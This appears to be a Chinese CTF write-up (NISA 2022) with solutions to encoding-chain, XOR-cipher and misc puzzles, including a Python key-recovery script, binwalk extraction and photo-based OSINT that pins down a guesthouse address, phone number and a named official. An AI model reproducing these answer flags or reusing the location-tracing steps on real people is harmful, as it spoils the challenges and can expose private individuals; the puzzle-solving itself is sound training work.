..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ....! .!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ..... !.!!! !!!!! !!!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! ...!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... .!.!! !!!!! !!!!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... ...!. !!!!! !!!!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?.. ..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
....! .!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... .....
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!!
.?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... .....
..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... ..... .!.!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ..... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... .....
..... ..... ..!.! !!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... ..... !.!!! !!!!! !!!!! !!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... !.!!! .?... ..... ..... !?!!. ?.... ..... ...?.
?!.?. ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
....! ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.? ..... .....
..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!.
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !!!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.!! !!!!! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..... .!... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..... ..... ..!.! !!!!! !!!!! !!!!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!! !!!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..... .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! ..... !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... ....! .!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... .!.!! !!!!! !!.?. ..... .....
..!?! !.?.. ..... ..... ?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ....! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... .....
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .....
..!.! !!!!! !!!!! !!!!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! .?...
..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... ..... !.!!! !!!!!
!!!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... !.... .!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?... ..... ..... ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ....! .!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?. .....
..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... .....
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .....
..... .!.!! !!!!! !!!!! !!!!! !!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ....! ...!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?... ..... ..... ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... !.... .!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?..!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... .....
....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!.
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?... ..... ...!?
!!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!!
!!?.? !.?!! !!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... .....
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..... .....
..!.! !!!!! !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.! !!!!! !!!!! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?. ..... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... .!... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?..! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... .....
!?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! ...!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. !.?.. ..... ....! ?!!.?
..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?.
?!.?! !!!!! !!!!! .!... ..... ..... ..!.! !!!!! !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... ...!. !!!!! !!!!! !.?.. ..... ..... .!?!! .?... .....
....? .?!.? ..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.?
!.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!.
!.... ..... !.... ...!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!!
.?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .!... ..!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... ..... .!... ....! .?... ..... ...!? !!.?. .....
....? .?!.? ..... ..... ..... ..... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... !.!!! .?... ..... ..... !?!!. ?.... ..... ...?.
?!.?. ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!.
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !!!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.!! !!!!! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
....! ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ..!.. .!.?. ..... .....
..!?! !.?.. ..... ..... ?.?!. ?.... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... ..!.! !!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... ..!.! !!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! .....
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... !.!!! !!!!! !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... !.... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?....
..... ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... !.... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? ..... ..... ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... ..!.! !!!!! !!!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ....! ..... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.?
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!!!!
!!!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?...
..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!! !!!.? ..... ..... ...!?
!!.?. ..... ..... .?.?! .?... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... !.... ..... !.?.. ..... ..... .!?!! .?... .....
....? .?!.? !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ..... ...!.
!!!!! !!!!! !!!!! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!.
!!!!! !!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ..... .....
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!!
!!!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!. !!!.? ..... ..... ...!?
!!.?. ..... ..... .?.?! .?... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... ..... .!.!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?.. !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
..!.! !!!!! !.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ...!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!. !!!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!. !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ..... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ...!. ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!.
!!!!! !!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! .!!!! !!!!! !!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!. ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.?
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!!!!
!!!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!! !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..... ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... !.... .!.?. ..... ..... ..!?! !.?..
..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..!.. ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... .!...
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ...!. ?.... .....
..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!. !!!!! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... !.... ...!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... .....
....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!.
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?... ..... ...!?
!!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!!
!!?.? !.?!! !!!!! !!!!. !.... ...!. ?.... ..... ..... .!?!! .?... .....
..... .?.?! .?!.? .

Ook!解码后

\u0065\u0047\u006c\u0069\u005a\u0057\u0067\u0074\u0061\u0032\u0056\u006a\u0062\u0032\u0063\u0074\u0064\u006e\u006c\u0032\u0059\u0057\u0073\u0074\u0062\u0057\u006c\u0073\u0061\u0057\u0077\u0074\u0062\u0058\u006c\u0074\u005a\u0057\u0059\u0074\u0059\u006e\u0056\u0077\u0059\u0057\u0067\u0074\u0065\u006d\u0056\u0077\u0061\u0057\u0067\u0074\u0061\u0047\u0046\u0069\u0065\u0057\u0073\u0074\u0062\u0047\u0056\u0073\u0064\u0057\u0051\u0074\u0059\u0032\u0039\u0073\u0064\u0057\u0073\u0074\u0062\u0048\u006c\u0030\u0062\u0032\u0077\u0074\u0061\u0033\u0056\u0074\u0061\u0057\u0067\u0074\u0062\u0057\u0039\u0036\u0064\u0058\u0067\u003d

Unicode解码后

ZUdsaVpXZ3RhMlZqYjJjdGRubDJZV3N0Yldsc2FXd3RiWGx0WldZdFluVndZV2d0ZW1Wd2FXZ3RhR0ZpZVdzdGJHVnNkV1F0WTI5c2RXc3RiSGwwYjJ3dGEzVnRhV2d0Ylc5NmRYZz0=

Base64解码后

xibeh-kecog-vyvak-milil-mymef-bupah-zepih-habyk-lelud-coluk-lytol-kumih-mozux

BubbleBabble解码后

AVFN{h_xa0j_jU@g_!_guvaX}

ROT13解码后

NISA{u_kn0w_wH@t_!_thinK}

xor

是个原题

EXP

# -*- coding: utf-8 -*-
import base64
from Crypto.Util import number, strxordef getK(a,enc_a):l=a[:16]r=a[16:]_l=enc_a[:16]_r=enc_a[16:]kl=strxor.strxor(strxor.strxor(r,l),_r)kr=strxor.strxor(_l,r)return [kl,kr]def dec(enc_a,kl,kr):_l=enc_a[:16]_r=enc_a[16:]r=strxor.strxor(_l,kr)l=strxor.strxor(strxor.strxor(_r,kl),r)return l+r        test="i03yXzXWe4QTiwJHlUZo6iqEdDkwJVviSOQ7CM3vJmM="
enc_test="4EnYOhbivTMP5r4VYLA8cwJBFTXIeeKAoNf/3ctgLLA="
enc_flag="+qyVMEei1eN3YbV/z2kjcaCKngWc2pW2/e7HwpXKaj0="
test=base64.b64decode(test.encode())
enc_test=base64.b64decode(enc_test.encode())
enc_flag=base64.b64decode(enc_flag.encode())kkey=[]
kkey=getK(test,enc_test)
fle=dec(enc_flag,kkey[0],kkey[1])
print(fle)

NSSCTF{3c4e05db6512d51e0a93ae320c0bb69a}

Misc

签到

huaji?

binwalk分离得到压缩包

得到密码ctf_NISA_2022,解压得到flag。

flag{Nls@_FumYEnnOjy}

bqt

把图片移开下面有字

# -*- coding: utf-8 -*-
m = "c8e9aca0c3f4e6e5f2a1a0d4e8e5a0e6ece1e7a0e9f3baa0e6ece1e7fbf7e5e6e5efe9e4eae7efe5e4f3e6e9eff2f0e5e6e4e6e7e7e6e4f3e5fd"
num=""
for i in range(0,len(m),2):hex = m[i:i+2]num += chr(int(hex,16)-128)
print(num)

Hi, Ctfer! The flag is: flag{wefeoidjgoedsfiorpefdfggfdse}

where_is_here

百度识图发现是一个叫鼓浪屿雅筑旅馆的地方

别的都好找,手机号是携程上找到的。

NSSCTF{厦门市思明区鼓浪屿康泰路25号17746048875}

不愉快的地方

百度识图发现是一个叫清溪川的地方,google能看到坐标跟网址。

官网里有信息

翻译一下,第一个就是要找的,叫金贤民。

NSSCTF{清溪川_37.56,126.97_金贤民_6801}

神秘数字

